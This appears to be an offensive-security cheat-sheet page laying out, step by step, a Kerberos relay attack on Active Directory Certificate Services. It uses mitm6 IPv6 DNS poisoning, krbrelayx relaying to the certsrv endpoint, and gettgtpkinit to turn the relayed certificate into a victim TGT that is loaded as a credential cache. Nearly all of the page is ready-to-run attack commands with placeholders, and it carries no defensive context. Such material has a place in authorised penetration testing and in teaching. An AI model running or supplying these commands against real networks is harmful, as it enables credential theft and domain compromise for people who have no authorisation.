Relay (DNS to HTTP)
Exploit
Last updated
## Run krbrelayx.py to start the relay channel
krbrelayx.py --target http://adcs.domain.com/certsrv/ -ip [attacker ip] --victim [victim FQDN] --adcs --template [CA template]
## Start IPv6 poisoning targeting our victim with the AD CS host as the relay target
mitm6 --domain [domain] --host-allowlist [victim FQDN] --relay [AD CS FQDN]
## Request a TGT using the obtained base-64 certificate (pfx)
gettgtpkinit.py -pfx-base64 [base64 certificate] '[domain]/victim$' victim.ccache
## Set the newly obtained ccache to the Kerberos credential cache environment variable
export KRB5CCNAME=/path/to/victim.ccache